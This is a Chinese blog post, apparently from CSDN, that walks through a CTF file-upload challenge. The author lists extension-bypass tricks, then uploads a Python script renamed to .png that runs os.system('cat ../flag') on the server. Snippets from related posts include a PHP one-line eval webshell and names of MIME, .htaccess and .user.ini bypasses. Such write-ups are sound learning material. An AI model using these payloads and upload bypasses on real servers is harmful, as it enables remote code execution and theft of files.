ctf Flask_FileUpload

已于 2024-08-23 07:46:08 修改
阅读量215 收藏
点赞数 2
分类专栏: ctf 文章标签: 网络安全
于 2024-08-20 15:40:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43256484/article/details/141360215
版权

BP抓包后直接修改后缀,探测上传的过滤规则。在上传文件时,看到上传规则中只允许上传jpg和png文件。
1.直接修改png为php
2.修改png为php3
3.::$DATA
4.双写pphphp

发现不对呀,有点莽了,可能不是这个思路

遂老样子,点开F12,发现
在这里插入图片描述
哦,原来后台会以python执行用户上传的文件。点击
在这里插入图片描述
发现支持上传png和jpg
在这里插入图片描述
遂写一个txt,完活后将后缀修改为png。
(此处还需要ls看看路径,一步步进去)

import os
os.system("cat ../flag")

得出flag{48ab44a086c207fe9be94b39c8b91720}

我来试试水呀
关注
专栏目录
ctf文件上传
Zheng_Jay的博客
11-15 4120
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
CTF之路:Flask_FileUpload文件上传漏洞利用、关于os.system()与更强大的os.popen()
zw05011的博客
01-08 3913
1.题目 BP上分析数据包,发现有提示: Give me the file, and I will return the Running results by python to you! 意思是:上传一个文件,系统将用python运行它,并返回结果 经验告诉我们,上传的文件里应该含有python可执行代码。 知识点 os.system()函数实现在程序中执行命令行命令 解题分析 上传文件发现似乎只能上传图片 这也没关系,可以把文件重命名为.png/jpg 打开一个file,写入代码 import os
CTFFlask_FileUpload
qq_74263993的博客
04-05 289
查看源码,发现注释告诉我们会运行python的文件,但是系统只能上传图片格式(这个是自己尝试知道的)上传查看源码得到 flag{c6d732debc82421a5e7aba831765e915}那我们就写一个python代码改成jpg或者png格式的文件。拿到题目就一个上传文件的网页。
[CTF]-Web:文件上传题综合解析
2301_79326813的博客
07-05 351
正常上传一句话木马的php,连接蚁剑即可。
ctf大赛题目 格式为图片格式
08-03
ctf比赛的部分题目 格式为图片格式 英语 可以上手做联系用................................................................................
小白的ctf之路之文件上传浅谈
glass_york的博客
01-12 1707
文件上传
ctf-web入门-文件上传
whisper921的博客
05-28 4190
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1059
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
第5天下篇:在Flask应用中使用用户认证—Flask_Login
猫姐的博客
06-17 910
原文: http://www.catonlinepy.tech/ 声明: 原创不易,未经许可,不得转载 接第5天上篇的内容,我们接着介绍用户注册功能的实现 3. 用户的注册 3.1 注册表单及前端渲染 根据经验,当我们在登录某个应用时,如果我们没有在平台注册过账号,平台会提醒我们注册一个账号,注册成功后方可进行登陆。与登录页面的实现类似,前端的注册页面也需要后台传入注册表单,然后Jinjia2...
CTFHubWeb—文件上传
qq_45927819的博客
07-27 1631
文章目录无验证前端验证.htaccess方法一方法二MIME绕过文件头检查00截断 无验证 没什么限制,直接一句话木马 <?php @eval($_POST['upload']);?> 提交成功! 并且提示了文件的相对路径,那我们可以直接使用蚁剑或者菜刀连接 打开便可以得到flag! 前端验证 既然是前端js验证,那我们尝试用burpsuite抓包 上题写的一句话木马还可以接着用,但是我们要将他的后缀改成png或者jpg,抓包: forward放包,上传成功!提示了文件路径,蚁剑连接
buuctf文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1547
文件上传漏洞笔记
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3169
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTF文件上传 与 条件竞争上传
最新发布
2301_81556781的博客
08-01 487
htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。
CTFHub_文件上传
weixin_47443077的博客
08-06 671
CTFHub_文件上传 文章目录CTFHub_文件上传0x01 无验证0x02 js前端验证0x03 .htaccess0x04 MIME绕过0x05 00截断0x06 双写后缀 0x01 无验证 打开页面如图示: 上传一句话木马用蚁剑连接 <?php @eval($_POST[cmd]);?> 因为没有任何限制,就直接上传.php木马文件 上传成功,显示上传文件相对路径,用蚁剑连接 连接成功,可在/var/www/html下找到flag! 0x02 js前端验证 打开页面如图示:
网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1)
2401_84301853的博客
05-04 2394
日志包含过滤关键字是log所以用拼接绕过上传完.user.ini和图片后访问网站然后修改ua头信息。
CTF文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5719
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值